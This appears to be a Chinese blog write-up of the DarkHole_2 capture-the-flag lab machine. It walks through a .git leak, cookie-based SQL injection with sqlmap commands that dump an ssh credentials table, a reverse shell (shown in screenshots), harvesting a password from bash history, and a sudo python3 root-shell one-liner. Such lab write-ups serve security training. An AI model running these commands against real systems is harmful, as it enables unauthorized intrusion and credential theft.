每周打靶-DarkHole系列靶机实-DarkHole_2

1.信息搜集

使用nmap扫描存活主机
image.png
继续扫描靶机开放端口及其对应服务,发现开放了22(ssh)、80(http)端口
image.png
使用浏览器进行的登陆,发现登陆按钮,页面上也没有什么其他可点击选项,点击login
image.png
到达登陆界面后尝试了几次登陆,发现不太可行,又因为靶机描述,不要浪费你的时间去暴力破解
image.png
image.png

2…git泄露

此路不通,根据刚才nmap扫描出来的信息,可能存在.git泄露,开始扫描敏感目录,发现确实有
image.png

还可以使用 Githack 或者 Git-dumper 来分析 .git 文件

wget遍历下载 .git 文件
image.png
git log 查看历史提交,发现可疑信息
image.png
使用git reset --hard [log hash]恢复到指定版本号,–hard参数撤销工作区中所有未提交的修改内容,将暂存区与工作区都回到上一次版本,并删除之前的所有信息提交。然后查看 login.php.
image.png

3.SQL(cookie)注入

发现账户密码:lush@admin.com::321,然后去网页端登陆,登陆成功,并发现参数id=1,猜测有sql注入,开始尝试
image.png
打开开发者工具,获取cookie:69jv8dq9dgtq0l35abur53vv1o
image.png
开始使用 sqlmap 进行注入
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" --batch
发现存在注入漏洞
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" --current-db 列出数据库
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" -D darkhole_2 --tables 列出表
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" -D darkhole_2 -T ssh --dump 将ssh表里的数据都dump下来
image.png
得到账户密码jehad::fool,使用ssh登陆
image.png

4.初提权

开始尝试提权,
sudo权限
image.png
suid文件
image.png
定时任务,发现单独给9999端口开了一个php服务器
image.png
使用kali生成反弹shell
image.png
开启http服务
image.png
使用靶机进行下载
image.png
kali进行 nc 监听 9999 端口
image.png
靶机自己访问shell
image.png
成功获取到shell
image.png

5.中提权

开始提权,尝试 sudo -l 发现不可以,开始查看历史命令 cat 。bash_history
image.png
image.png
发现本用户密码:losy::gang 开始ssh
image.png

6.末提权

登陆成功,查看 sudo -l 权限
image.png
发现可以用 python3 进行提权 sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"
image.png
完工!!!
image.png
Good game!!!

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值